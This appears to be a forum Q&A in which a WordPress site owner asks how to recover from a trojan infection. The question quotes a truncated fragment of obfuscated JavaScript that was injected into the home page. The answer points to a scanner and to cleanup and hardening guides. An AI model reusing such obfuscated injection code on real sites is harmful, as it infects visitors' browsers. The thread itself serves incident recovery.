# Wordpress Trojan issue

Tags: wordpress, trojan

I accessed the wordpress website I am making and received a trojan warning I have checked it with various online scanners and it appears to be some inline frame code issue. I didnt even know wordpress could get infected.

Please help me, I've tried in other stackexchange wordpress and webmaster forums with no answers, all the pros are in here... :)

THis is the screenshot.

https://i.stack.imgur.com/NaSE6.png

Now this is some malicious code script code in the home page

> if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new
>   Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-

....  and a lot more

How can i recover???

Comment: FYI there have been many Wordpress security issues over the years.  Be sure and keep up with all security updates.

Answer (score 1, accepted):

Use http://sitecheck.sucuri.net/scanner/

And tp repair, see [FAQ: My site was hacked « WordPress Codex](http://codex.wordpress.org/FAQ_My_site_was_hacked) and [How to completely clean your hacked wordpress installation](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) and [How to find a backdoor in a hacked WordPress](http://ottopress.com/2009/hacked-wordpress-backdoors/) and [Hardening WordPress « WordPress Codex](http://codex.wordpress.org/Hardening_WordPress) and tell your host. Change all passswords. Scan your own PC.